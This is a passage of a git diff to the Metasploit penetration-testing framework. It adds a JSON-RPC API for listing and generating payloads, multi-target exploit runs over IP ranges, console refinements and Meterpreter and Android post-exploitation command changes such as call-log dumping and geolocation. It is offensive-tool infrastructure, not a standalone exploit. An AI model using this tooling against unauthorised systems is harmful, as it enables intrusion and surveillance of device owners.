METHOD_GROUP_SEPARATOR = '.' + + MODULE_EXECUTE_KEY = 'module.execute' + PAYLOAD_MODULE_TYPE_KEY = 'payload' + PAYLOAD_KEY = 'payload' + + # Instantiate an RpcCommand. + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @param execute_timeout [Integer] execute timeout duration in seconds + def initialize(framework, execute_timeout: 7200) + super(framework, execute_timeout: execute_timeout) + + # The legacy Msf::RPC::Service will not be started, however, it will be used to proxy + # requests to existing handlers. This frees the command from having to act as the + # service to RPC_Base subclasses and expose accessors for tokens and users. + @legacy_rpc_service = ::Msf::RPC::Service.new(@framework, { + execute_timeout: @execute_timeout + }) + end + + # @raise [RuntimeError] The method is not implemented + def register_method(method, name: nil) + raise "#{self.class.name}##{__method__} is not implemented" + end + + # Invokes the method on the receiver object with the specified params, + # returning the method's return value. + # @param method [String] the RPC method name + # @param params [Array, Hash] parameters for the RPC call + # @returns [Object] the method's return value. + def execute(method, params) + result = execute_internal(method, params) + result = post_process_result(result, method, params) + + result + end + + private + + # Internal method that invokes the method on the receiver object with + # the specified params, returning the method's return value. + # @param method [String] the RPC method name + # @param params [Array, Hash] parameters for the RPC call + # @raise [MethodNotFound] The method does not exist + # @raise [Timeout::Error] The method failed to terminate in @execute_timeout seconds + # @returns [Object] the method's return value. + def execute_internal(method, params) + group, base_method = parse_method_group(method) + + method_name = "rpc_#{base_method}" + method_name_noauth = "rpc_#{base_method}_noauth" + + handler = (find_handler(@legacy_rpc_service.handlers, group, method_name) || find_handler(@legacy_rpc_service.handlers, group, method_name_noauth)) + if handler.nil? + raise MethodNotFound.new(method) + end + + if handler.respond_to?(method_name_noauth) + method_name = method_name_noauth + end + + ::Timeout.timeout(@execute_timeout) do + params = prepare_params(params) + if params.nil? + return handler.send(method_name) + elsif params.is_a?(Array) + return handler.send(method_name, *params) + else + return handler.send(method_name, **params) + end + end + end + + # Parse method string in the format "group.base_method_name". + # @param method [String] the RPC method name + # @returns [Array] Tuple of strings, group and base_method + def parse_method_group(method) + idx = method.rindex(METHOD_GROUP_SEPARATOR) + if idx.nil? + group = nil + base_method = method + else + group = method[0..idx - 1] + base_method = method[idx + 1..-1] + end + return group, base_method + end + + # Find the concrete Msf::RPC::RPC_Base handler for the group and method name. + # @param handlers [Hash] hash of group String - Msf::RPC::RPC_Base object pairs + # @param group [String] the RPC group + # @param method_name [String] the RPC method name + # @returns [Msf::RPC::RPC_Base] concrete Msf::RPC::RPC_Base instance if one exists; otherwise, nil. + def find_handler(handlers, group, method_name) + handler = nil + if !handlers[group].nil? && handlers[group].respond_to?(method_name) + handler = handlers[group] + end + + handler + end + + # Prepare params for use by RPC methods by converting all hashes + # inside of Arrays to use strings for their names (keys). + # @param params [Object] parameters for the RPC call + # @returns [Object] If params is an Array all hashes it contains will be + # modified; otherwise, the object will simply pass-through. + def prepare_params(params) + clean_params = params + if params.is_a?(Array) + clean_params = params.map do |p| + if p.is_a?(Hash) + stringify_names(p) + else + p + end + end + end + + clean_params + end + + # Stringify the names (keys) in hash. + # @param hash [Hash] input hash + # @returns [Hash] a new hash with strings for the keys. + def stringify_names(hash) + JSON.parse(JSON.dump(hash), symbolize_names: false) + end + + # Perform custom post processing of the execute result data. + # @param result [Object] the method's return value + # @param method [String] the RPC method name + # @param params [Array, Hash] parameters for the RPC call + # @returns [Object] processed method's return value + def post_process_result(result, method, params) + # post-process payload module result for JSON output + if method == MODULE_EXECUTE_KEY && params.size >= 2 && + params[0] == PAYLOAD_MODULE_TYPE_KEY && result.key?(PAYLOAD_KEY) + result[PAYLOAD_KEY] = Base64.strict_encode64(result[PAYLOAD_KEY]) + end + + result + end + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/v2_0/rpc_test.rb b/lib/msf/core/rpc/json/v2_0/rpc_test.rb new file mode 100644 index 0000000000..7a959a7a0c --- /dev/null +++ b/lib/msf/core/rpc/json/v2_0/rpc_test.rb @@ -0,0 +1,24 @@ +module Msf::RPC::JSON::V2_0 + # Receiver class for demonstration RPC version 2.0. + class RpcTest + + def initialize + r = Random.new + @rand_num = r.rand(0..100) + end + + def self.add(x, y) + x + y + end + + def get_instance_rand_num + @rand_num + end + + def add_instance_rand_num(x) + @rand_num = @rand_num + x + + @rand_num + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index a2a5f4005b..fc99e4c28f 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- +require 'json' require 'msf/util/document_generator' module Msf @@ -39,38 +40,144 @@ class RPC_Module < RPC_Base end - # Returns a list of payload module names. The 'payload/' prefix will not be included. + # Returns a list of payload module names or a hash with payload module names as keys to hashes + # that contain the module information fields requested. The 'payload/' prefix will not be included. # - # @return [Hash] A list of payload module names. It contains the following key: - # * 'modules' [Array] Payload module names, for example: ['windows/x64/shell_reverse_tcp'] + # @param module_info [String] Comma-separated list of module information field names. + # If this is nil, then only module names are returned. Default: nil + # @param arch [String] Comma-separated list of one or more architectures that + # the module must support. The module need only support one of the architectures + # to be included, not all architectures. Default: nil + # + # @return [Hash] If module_info is nil, a list of payload module names. It contains the following key: + # * 'modules' [Array] Payload module names, for example: ['windows/x64/shell_reverse_tcp'] + # If module_info is not nil, payload module names as keys to hashes that contain the requested module + # information fields. It contains the following key: + # * 'modules' [Hash] for example: + # {"windows/x64/shell_reverse_tcp"=>{"name"=>"Windows x64 Command Shell, Reverse TCP Inline"} # @example Here's how you would use this from the client: # rpc.call('module.payloads') - def rpc_payloads - { "modules" => self.framework.payloads.keys } + def rpc_payloads(module_info = nil, arch = nil) + module_info_contains_size = false + + unless module_info.nil? + module_info = module_info.strip.split(',').map(&:strip) + module_info.map!(&:to_sym) + module_info_contains_size = module_info.include?(:size) + end + + unless arch.nil? + arch = arch.strip.split(',').map(&:strip) + end + + data = module_info.nil? ? [] : {} + arch_filter = !arch.nil? && !arch.empty? ? arch : nil + self.framework.payloads.each_module('Arch' => arch_filter) do |name, mod| + if module_info.nil? + data << name + else + module_instance = mod.new + if !module_info_contains_size && mod.method_defined?(:generate) + # Unless the size field is specified in module_info, modify the generate + # method for the module instance in order to skip payload generation when + # the size method is called by Msf::Serializer::Json.dump_module, thus + # reducing the processing time. + class << module_instance + def generate + '' + end + end + end + + tmp_mod_info = ::JSON.parse(Msf::Serializer::Json.dump_module(module_instance), symbolize_names: true) + data[name] = tmp_mod_info.select { |k,v| module_info.include?(k) } + end + end + + { "modules" => data } end - - # Returns a list of encoder module names. The 'encoder/' prefix will not be included. + # Returns a list of encoder module names or a hash with encoder module names as keys to hashes + # that contain the module information fields requested. The 'encoder/' prefix will not be included. # - # @return [Hash] A list of encoder module names. It contains the following key: - # * 'modules' [Array] Encoder module names, for example: ['x86/unicode_upper'] + # @param module_info [String] Comma-separated list of module information field names. + # If this is nil, then only module names are returned. Default: nil + # @param arch [String] Comma-separated list of one or more architectures that + # the module must support. The module need only support one of the architectures + # to be included, not all architectures. Default: nil + # + # @return [Hash] If module_info is nil, a list of encoder module names. It contains the following key: + # * 'modules' [Array] Encoder module names, for example: ['x86/unicode_upper'] + # If module_info is not nil, encoder module names as keys to hashes that contain the requested module + # information fields. It contains the following key: + # * 'modules' [Hash] for example: + # {"x86/unicode_upper"=>{"name"=>"Alpha2 Alphanumeric Unicode Uppercase Encoder", "rank"=>"Manual"}} # @example Here's how you would use this from the client: # rpc.call('module.encoders') - def rpc_encoders - { "modules" => self.framework.encoders.keys } + def rpc_encoders(module_info = nil, arch = nil) + unless module_info.nil? + module_info = module_info.strip.split(',').map(&:strip) + module_info.map!(&:to_sym) + end + + unless arch.nil? + arch = arch.strip.split(',').map(&:strip) + end + + data = module_info.nil? ? [] : {} + arch_filter = !arch.nil? && !arch.empty? ? arch : nil + self.framework.encoders.each_module('Arch' => arch_filter) do |name, mod| + if module_info.nil? + data << name + else + tmp_mod_info = ::JSON.parse(Msf::Serializer::Json.dump_module(mod.new), symbolize_names: true) + data[name] = tmp_mod_info.select { |k,v| module_info.include?(k) } + end + end + + { "modules" => data } end - - # Returns a list of NOP module names. The 'nop/' prefix will not be included. + # Returns a list of NOP module names or a hash with NOP module names as keys to hashes + # that contain the module information fields requested. The 'nop/' prefix will not be included. # - # @return [Hash] A list of NOP module names. It contains the following key: - # * 'modules' [Array] NOP module names, for example: ['x86/single_byte'] + # @param module_info [String] Comma-separated list of module information field names. + # If this is nil, then only module names are returned. Default: nil + # @param arch [String] Comma-separated list of one or more architectures that + # the module must support. The module need only support one of the architectures + # to be included, not all architectures. Default: nil + # + # @return [Hash] If module_info is nil, a list of NOP module names. It contains the following key: + # * 'modules' [Array] NOP module names, for example: ['x86/single_byte'] + # If module_info is not nil, NOP module names as keys to hashes that contain the requested module + # information fields. It contains the following key: + # * 'modules' [Hash] for example: + # {"x86/single_byte"=>{"name"=>"Single Byte", "rank"=>"Normal"}} # @example Here's how you would use this from the client: # rpc.call('module.nops') - def rpc_nops - { "modules" => self.framework.nops.keys } - end + def rpc_nops(module_info = nil, arch = nil) + unless module_info.nil? + module_info = module_info.strip.split(',').map(&:strip) + module_info.map!(&:to_sym) + end + unless arch.nil? + arch = arch.strip.split(',').map(&:strip) + end + + data = module_info.nil? ? [] : {} + arch_filter = !arch.nil? && !arch.empty? ? arch : nil + self.framework.nops.each_module('Arch' => arch_filter) do |name, mod| + if module_info.nil? + data << name + else + tmp_mod_info = ::JSON.parse(Msf::Serializer::Json.dump_module(mod.new), symbolize_names: true) + data[name] = tmp_mod_info.select { |k,v| module_info.include?(k) } + end + end + + { "modules" => data } + end # Returns a list of post module names. The 'post/' prefix will not be included. # @@ -376,10 +483,57 @@ class RPC_Module < RPC_Base end + # Returns a list of executable format names. + # + # @return [Array] A list of executable format names, for example: ["exe"] + # @example Here's how you would use this from the client: + # rpc.call('module.executable_formats') + def rpc_executable_formats + ::Msf::Util::EXE.to_executable_fmt_formats + end + + # Returns a list of transform format names. + # + # @return [Array] A list of transform format names, for example: ["powershell"] + # @example Here's how you would use this from the client: + # rpc.call('module.transform_formats') + def rpc_transform_formats + ::Msf::Simple::Buffer.transform_formats + end + + # Returns a list of encryption format names. + # + # @return [Array] A list of encryption format names, for example: ["aes256"] + # @example Here's how you would use this from the client: + # rpc.call('module.encryption_formats') + def rpc_encryption_formats + ::Msf::Simple::Buffer.encryption_formats + end + + # Returns a list of platform names. + # + # @return [Array] A list of platform names, for example: ["linux"] + # @example Here's how you would use this from the client: + # rpc.call('module.platforms') + def rpc_platforms + supported_platforms = [] + Msf::Module::Platform.subclasses.each { |c| supported_platforms << c.realname.downcase } + supported_platforms.sort + end + + # Returns a list of architecture names. + # + # @return [Array] A list of architecture names, for example: ["x64"] + # @example Here's how you would use this from the client: + # rpc.call('module.architectures') + def rpc_architectures + supported_archs = ARCH_ALL.dup + supported_archs.sort + end # Returns a list of encoding formats. # - # @return [Array] Encoding foramts. + # @return [Array] Encoding formats. # @example Here's how you would use this from the client: # rpc.call('module.encode_formats') def rpc_encode_formats diff --git a/lib/msf/core/web_services/json_rpc_app.rb b/lib/msf/core/web_services/json_rpc_app.rb new file mode 100644 index 0000000000..4f470dea29 --- /dev/null +++ b/lib/msf/core/web_services/json_rpc_app.rb @@ -0,0 +1,67 @@ +require 'sinatra/base' +require 'swagger/blocks' +require 'sysrandom/securerandom' +require 'warden' +require 'msf/core/rpc' +require 'msf/core/db_manager/http/authentication' +require 'msf/core/db_manager/http/servlet_helper' +require 'msf/core/db_manager/http/servlet/auth_servlet' +require 'msf/core/web_services/servlet/json_rpc_servlet' + +class JsonRpcApp < Sinatra::Base + helpers ServletHelper + helpers Msf::RPC::JSON::DispatcherHelper + + # Servlet registration + register AuthServlet + register JsonRpcServlet + + set :framework, Msf::Simple::Framework.create({}) + set :dispatchers, {} + + configure do + set :sessions, {key: 'msf-ws.session', expire_after: 300} + set :session_secret, ENV.fetch('MSF_WS_SESSION_SECRET') { SecureRandom.hex(16) } + end + + before do + # store DBManager in request environment so that it is available to Warden + request.env['msf.db_manager'] = get_db + # store flag indicating whether authentication is initialized in the request environment + @@auth_initialized ||= get_db.users({}).count > 0 + request.env['msf.auth_initialized'] = @@auth_initialized + end + + use Warden::Manager do |config| + # failed authentication is handled by this application + config.failure_app = self + # don't intercept 401 responses since the app will provide custom failure messages + config.intercept_401 = false + config.default_scope = :api + + config.scope_defaults :user, + # whether to persist the result in the session or not + store: true, + # list of strategies to use + strategies: [:password], + # action (route) of the failure application + action: "#{AuthServlet.api_unauthenticated_path}/user" + + config.scope_defaults :api, + # whether to persist the result in the session or not + store: false, + # list of strategies to use + strategies: [:api_token], + # action (route) of the failure application + action: AuthServlet.api_unauthenticated_path + + config.scope_defaults :admin_api, + # whether to persist the result in the session or not + store: false, + # list of strategies to use + strategies: [:admin_api_token], + # action (route) of the failure application + action: AuthServlet.api_unauthenticated_path + end + +end \ No newline at end of file diff --git a/lib/msf/core/web_services/servlet/json_rpc_servlet.rb b/lib/msf/core/web_services/servlet/json_rpc_servlet.rb new file mode 100644 index 0000000000..d9d7482f32 --- /dev/null +++ b/lib/msf/core/web_services/servlet/json_rpc_servlet.rb @@ -0,0 +1,34 @@ +require 'msf/core/rpc' + +module JsonRpcServlet + + def self.api_path + '/api/:version/json-rpc' + end + + def self.registered(app) + app.post JsonRpcServlet.api_path, &post_rpc + end + + ####### + private + ####### + + # Process JSON-RPC request + def self.post_rpc + lambda { + warden.authenticate! + begin + body = request.body.read + tmp_params = sanitize_params(params) + data = get_dispatcher(settings.dispatchers, tmp_params[:version].to_sym, settings.framework).process(body) + set_raw_response(data) + rescue => e + print_error("There was an error executing the RPC: #{e.message}.", e) + error = Msf::RPC::JSON::Dispatcher.create_error_response(Msf::RPC::JSON::InternalError.new(e)) + data = Msf::RPC::JSON::Dispatcher.to_json(error) + set_raw_response(data, code: 500) + end + } + end +end \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 0e7fe0ce24..8cb1efce6f 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -824,7 +824,7 @@ class Core print_line " print - show all active routes" print_line print_line "Examples:" - print_line " Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1" + print_line " Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1" print_line " route add 192.168.0.0 255.255.255.0 1" print_line " route add 192.168.0.0/24 1" print_line diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index c18505e42f..2be16f0fdb 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -5,8 +5,9 @@ class Msf::Ui::Console::CommandDispatcher::Developer include Msf::Ui::Console::CommandDispatcher @@irb_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help banner." ], - "-e" => [ true, "Expression to evaluate." ]) + '-h' => [false, 'Help menu.' ], + '-e' => [true, 'Expression to evaluate.'] + ) def initialize(driver) super @@ -18,48 +19,77 @@ class Msf::Ui::Console::CommandDispatcher::Developer def commands { - 'irb' => 'Drop into irb scripting mode', - 'pry' => 'Open a Pry session on the current module or Framework', + 'irb' => 'Open an interactive Ruby shell in the current context', + 'pry' => 'Open the Pry debugger on the current module or Framework', 'edit' => 'Edit the current module or a file with the preferred editor', - 'reload_lib' => 'Reload one or more library files from specified paths', - 'log' => 'Displays framework.log starting at the bottom if possible' + 'reload_lib' => 'Reload Ruby library files from specified paths', + 'log' => 'Display framework.log paged to the end if possible' } end def local_editor - framework.datastore['LocalEditor'] || Rex::Compat.getenv('VISUAL') || Rex::Compat.getenv('EDITOR') + framework.datastore['LocalEditor'] || + Rex::Compat.getenv('VISUAL') || + Rex::Compat.getenv('EDITOR') || + Msf::Util::Helper.which('vim') || + Msf::Util::Helper.which('vi') end def local_pager - framework.datastore['LocalPager'] || Rex::Compat.getenv('PAGER') || Rex::Compat.getenv('MANPAGER') + framework.datastore['LocalPager'] || + Rex::Compat.getenv('PAGER') || + Rex::Compat.getenv('MANPAGER') || + Msf::Util::Helper.which('less') || + Msf::Util::Helper.which('more') end # XXX: This will try to reload *any* .rb and break on modules - def reload_file(path) - unless File.exist?(path) && path.end_with?('.rb') - print_error("#{path} must exist and be a .rb file") + def reload_file(path, print_errors: true) + full_path = File.expand_path(path) + + unless File.exist?(full_path) && full_path.end_with?('.rb') + print_error("#{full_path} must exist and be a .rb file") if print_errors return end # The file must exist to reach this, so we try our best here - if path =~ %r{^(?:\./)?modules/} - print_error("Reloading Metasploit modules is not supported (try 'reload')") + if full_path.start_with?(Msf::Config.module_directory, Msf::Config.user_module_directory) + print_error('Reloading Metasploit modules is not supported (try "reload")') if print_errors return end - print_status("Reloading #{path}") - load path + print_status("Reloading #{full_path}") + load full_path + end + + def reload_changed_files + # Using an array avoids shelling out, so we avoid escaping/quoting + changed_files = %w[git diff --name-only] + + output, status = Open3.capture2e(*changed_files, chdir: Msf::Config.install_root) + + unless status.success? + print_error("Git is not available: #{output.chomp}") + return + end + + files = output.split("\n") + + files.each do |file| + f = File.join(Msf::Config.install_root, file) + reload_file(file, print_errors: false) + end end def cmd_irb_help - print_line "Usage: irb" + print_line 'Usage: irb' print_line - print_line "Execute commands in a Ruby environment" + print_line 'Open an interactive Ruby shell in the current context.' print @@irb_opts.usage end # - # Goes into IRB scripting mode + # Open an interactive Ruby shell in the current context # def cmd_irb(*args) expressions = [] @@ -76,10 +106,16 @@ class Msf::Ui::Console::CommandDispatcher::Developer end if expressions.empty? - print_status("Starting IRB shell...\n") + print_status('Starting IRB shell...') begin - Rex::Ui::Text::IrbShell.new(binding).run + if active_module + print_status("You are in #{active_module.fullname}\n") + Rex::Ui::Text::IrbShell.new(active_module).run + else + print_status("You are in the \"framework\" object\n") + Rex::Ui::Text::IrbShell.new(framework).run + end rescue print_error("Error during IRB: #{$!}\n\n#{$@.join("\n")}") end @@ -89,6 +125,11 @@ class Msf::Ui::Console::CommandDispatcher::Developer driver.input.reset_tab_completion end else + # XXX: No vprint_status here either + if framework.datastore['VERBOSE'].to_s == 'true' + print_status("You are executing expressions in #{binding.receiver}") + end + expressions.each { |expression| eval(expression, binding) } end end @@ -104,12 +145,12 @@ class Msf::Ui::Console::CommandDispatcher::Developer def cmd_pry_help print_line 'Usage: pry' print_line - print_line 'Open a Pry session on the current module or Framework.' + print_line 'Open the Pry debugger on the current module or Framework.' print_line end # - # Open a Pry session on the current module or Framework + # Open the Pry debugger on the current module or Framework # def cmd_pry(*args) if args.include?('-h') @@ -141,7 +182,7 @@ class Msf::Ui::Console::CommandDispatcher::Developer print_line print_line "Edit the currently active module or a local file with #{local_editor}." print_line 'If a library file is specified, it will automatically be reloaded after editing.' - print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'." + print_line 'Otherwise, you can reload the active module with "reload" or "rerun".' print_line end @@ -166,7 +207,8 @@ class Msf::Ui::Console::CommandDispatcher::Developer editor = local_editor unless editor - editor = 'vim' + # ed(1) is the standard editor + editor = 'ed' print_warning("LocalEditor or $VISUAL/$EDITOR should be set. Falling back on #{editor}.") end @@ -192,22 +234,35 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def cmd_reload_lib_help - print_line 'Usage: reload_lib lib/to/reload.rb [...]' - print_line - print_line 'Reload one or more library files from specified paths.' - print_line + cmd_reload_lib('-h') end # - # Reload one or more library files from specified paths + # Reload Ruby library files from specified paths # def cmd_reload_lib(*args) - if args.empty? || args.include?('-h') || args.include?('--help') - cmd_reload_lib_help - return + options = OptionParser.new do |opts| + opts.banner = 'Usage: reload_lib lib/to/reload.rb [...]' + opts.separator '' + opts.separator 'Reload Ruby library files from specified paths.' + opts.separator '' + + opts.on '-h', '--help', 'Help banner.' do + return print(opts.help) + end + + opts.on '-a', '--all', 'Reload all* changed files in your current Git working tree. + *Excludes modules and non-Ruby files.' do + return reload_changed_files + end end - args.each { |path| reload_file(path) } + # The remaining unparsed arguments are files + files = options.order(args) + + return print(options.help) if files.empty? + + files.each { |file| reload_file(file) } end # @@ -220,15 +275,15 @@ class Msf::Ui::Console::CommandDispatcher::Developer def cmd_log_help print_line 'Usage: log' print_line - print_line 'Displays framework.log starting at the bottom if possible.' - print_line "For full effect, 'setg LogLevel 3' before running modules." + print_line 'Display framework.log paged to the end if possible.' + print_line 'For full effect, "setg LogLevel 3" before running modules.' print_line print_line "Log location: #{File.join(Msf::Config.log_directory, 'framework.log')}" print_line end # - # Displays framework.log starting at the bottom if possible + # Display framework.log paged to the end if possible # def cmd_log(*args) path = File.join(Msf::Config.log_directory, 'framework.log') @@ -237,7 +292,7 @@ class Msf::Ui::Console::CommandDispatcher::Developer pager = local_pager.to_s.include?('less') ? "#{local_pager} +G" : local_pager unless pager - pager = 'tail -n 24' + pager = 'tail -n 50' print_warning("LocalPager or $PAGER/$MANPAGER should be set. Falling back on #{pager}.") end diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index eadb76c7c7..419fa79f9c 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -47,6 +47,9 @@ class Exploit "Exploit" end + # + # Launches an exploitation single attempt. + # def exploit_single(mod, opts) begin session = mod.exploit_simple(opts) @@ -63,41 +66,7 @@ class Exploit end end - # If we were given a session, let's see what we can do with it - if session - if !opts['Background'] && session.interactive? - # If we aren't told to run in the background and the session can be - # interacted with, start interacting with it by issuing the session - # interaction command. - print_line - - driver.run_single("sessions -q -i #{session.sid}") - # Otherwise, log that we created a session - else - # Otherwise, log that we created a session - print_status("Session #{session.sid} created in the background.") - end - - elsif opts['RunAsJob'] && mod.job_id - # Indicate if he exploit as a job, indicate such so the user doesn't - # wonder what's up. - print_status("Exploit running as background job #{mod.job_id}.") - # Worst case, the exploit ran but we got no session, bummer. - - else - # If we didn't run a payload handler for this exploit it doesn't - # make sense to complain to the user that we didn't get a session - unless mod.datastore["DisablePayloadHandler"] - fail_msg = 'Exploit completed, but no session was created.' - print_status(fail_msg) - begin - framework.events.on_session_fail(fail_msg) - rescue ::Exception => e - wlog("Exception in on_session_open event handler: #{e.class}: #{e}") - wlog("Call Stack\n#{e.backtrace.join("\n")}") - end - end - end + return session end def cmd_exploit_tabs(str, words) @@ -117,11 +86,12 @@ class Exploit end # - # Launches an exploitation attempt. + # Launches exploitation attempts. # def cmd_exploit(*args) force = false module_opts = [] + any_session = false opts = { 'Encoder' => mod.datastore['ENCODER'], 'Payload' => mod.datastore['PAYLOAD'], @@ -195,14 +165,75 @@ class Exploit end rhosts = mod.datastore['RHOSTS'] - if rhosts - Rex::Socket::RangeWalker.new(rhosts).each do |rhost| + rhosts_range = Rex::Socket::RangeWalker.new(rhosts) + # For multiple targets exploit attempts. + if rhosts && rhosts_range.length.to_i > 1 + opts[:multi] = true + rhosts_range.each do |rhost| nmod = mod.replicant nmod.datastore['RHOST'] = rhost - exploit_single(nmod, opts) + # If rhost is the last target, let exploit handler stop. + opts["multi"] = false if rhost == (Rex::Socket.addr_itoa(rhosts_range.ranges.first.stop)) + # Catch the interrupt exception to stop the whole module during exploit + begin + print_status("Exploiting target #{rhost}") + session = exploit_single(nmod, opts) + rescue ::Interrupt + print_status("Stopping exploiting current target #{rhost}...") + print_status("Control-C again to force quit exploiting all targets.") + begin + Rex.sleep(1) + rescue ::Interrupt + raise $! + end + end + # If we were given a session, report it. + if session + print_status("Session #{session.sid} created in the background.") + any_session = true + end end + # For single target or no rhosts option. else - exploit_single(mod, opts) + session = exploit_single(mod, opts) + # If we were given a session, let's see what we can do with it + if session + any_session = true + if !opts['Background'] && session.interactive? + # If we aren't told to run in the background and the session can be + # interacted with, start interacting with it by issuing the session + # interaction command. + print_line + + driver.run_single("sessions -q -i #{session.sid}") + # Otherwise, log that we created a session + else + # Otherwise, log that we created a session + print_status("Session #{session.sid} created in the background.") + end + + elsif opts['RunAsJob'] && mod.job_id + # Indicate if he exploit as a job, indicate such so the user doesn't + # wonder what's up. + print_status("Exploit running as background job #{mod.job_id}.") + # Worst case, the exploit ran but we got no session, bummer. + end + end + + # If we didn't get any session and exploit ended luanch. + unless any_session + # If we didn't run a payload handler for this exploit it doesn't + # make sense to complain to the user that we didn't get a session + unless mod.datastore["DisablePayloadHandler"] + fail_msg = 'Exploit completed, but no session was created.' + print_status(fail_msg) + begin + framework.events.on_session_fail(fail_msg) + rescue ::Exception => e + wlog("Exception in on_session_open event handler: #{e.class}: #{e}") + wlog("Call Stack\n#{e.backtrace.join("\n")}") + end + end end end diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index 8671df9d4f..c300ee82e9 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -63,6 +63,9 @@ module Msf mod_rank: mod.rank, mod_platforms: mod.send(:module_info)['Platform'], mod_options: mod.options, + mod_side_effects: mod.side_effects, + mod_reliability: mod.reliability, + mod_stability: mod.stability, mod_demo: mod } diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index c7f7d3a513..2c6dfa1f49 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -257,6 +257,32 @@ module Msf end + # Returns the markdown format for module side effects. + # + # @param side_effects [Array] Module effects. + # @return [String] + def normalize_side_effects(side_effects) + md_side_effects = side_effects.collect { |s| "* #{s}\n" }.join + md_side_effects.empty? ? 'N/A' : md_side_effects + end + + + # Returns the markdown format for module reliability. + # + # @param reliability [Array] Module reliability. + # @return [String] + def normalize_reliability(reliability) + md_reliability = reliability.collect { |r| "* #{r}\n" }.join + md_reliability.empty? ? 'N/A' : md_reliability + end + + + def normalize_stability(stability) + md_stability = stability.collect { |s| "* #{s}\n" }.join + md_stability.empty? ? 'N/A' : md_stability + end + + # Returns a parsed demo ERB template. # # @param mod [Msf::Module] Metasploit module. diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb index 10dc519467..ebd68d032e 100644 --- a/lib/rex/post/meterpreter/channel.rb +++ b/lib/rex/post/meterpreter/channel.rb @@ -140,6 +140,7 @@ class Channel self.cid = cid self.type = type self.flags = flags + @mutex = Mutex.new # Add this instance to the list if (cid and client) @@ -150,8 +151,12 @@ class Channel ObjectSpace.define_finalizer(self, self.class.finalize(client, cid)) end - def self.finalize(client,cid) - proc { self._close(client,cid) } + def self.finalize(client, cid) + proc { + unless cid.nil? + self._close(client, cid) + end + } end ## @@ -301,11 +306,14 @@ class Channel end def _close(addends = nil) - unless self.cid.nil? - ObjectSpace.undefine_finalizer(self) - self.class._close(self.client, self.cid, addends) - self.cid = nil - end + # let the finalizer do the work behind the scenes + @mutex.synchronize { + unless self.cid.nil? + ObjectSpace.undefine_finalizer(self) + self.class._close(self.client, self.cid, addends) + self.cid = nil + end + } end # # Enables or disables interactive mode. @@ -370,7 +378,11 @@ class Channel # Stub close handler. # def dio_close_handler(packet) - client.remove_channel(self.cid) + @mutex.synchronize { + cid = self.cid + self.cid = nil + } + client.remove_channel(cid) # Trap IOErrors as parts of the channel may have already been closed begin @@ -378,9 +390,6 @@ class Channel rescue IOError end - # No more channel action, foo. - self.cid = nil - return true end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb index 5f6a28aaf8..c20bc250a5 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb @@ -98,6 +98,8 @@ class TcpClientChannel < Rex::Post::Meterpreter::Stream # 2 -> both # def shutdown(how = 1) + return false if self.cid.nil? + request = Packet.create_request('stdapi_net_socket_tcp_shutdown') request.add_tlv(TLV_TYPE_SHUTDOWN_HOW, how) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 8d3d0c2872..9abdbda6c1 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -385,7 +385,6 @@ class Console::CommandDispatcher::Android end def cmd_geolocate(*args) - generate_map = false geolocate_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], @@ -423,10 +422,8 @@ class Console::CommandDispatcher::Android def cmd_dump_calllog(*args) path = "calllog_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" dump_calllog_opts = Rex::Parser::Arguments.new( - '-h' => [ false, 'Help Banner' ], '-o' => [ true, 'Output path for call log'] - ) dump_calllog_opts.parse(args) do |opt, _idx, val| @@ -565,19 +562,30 @@ class Console::CommandDispatcher::Android def cmd_wlan_geolocate(*args) wlan_geolocate_opts = Rex::Parser::Arguments.new( - '-h' => [ false, 'Help Banner' ] + '-h' => [ false, 'Help Banner' ], + '-a' => [ true, 'API key' ], ) - wlan_geolocate_opts.parse(args) do |opt, _idx, _val| + api_key = '' + wlan_geolocate_opts.parse(args) do |opt, _idx, val| case opt when '-h' print_line('Usage: wlan_geolocate') print_line('Tries to get device geolocation from WLAN information and Google\'s API') print_line(wlan_geolocate_opts.usage) return + when '-a' + api_key = val end end + if api_key.blank? + print_error("You must enter an api_key") + print_error("e.g. wlan_geolocate -a 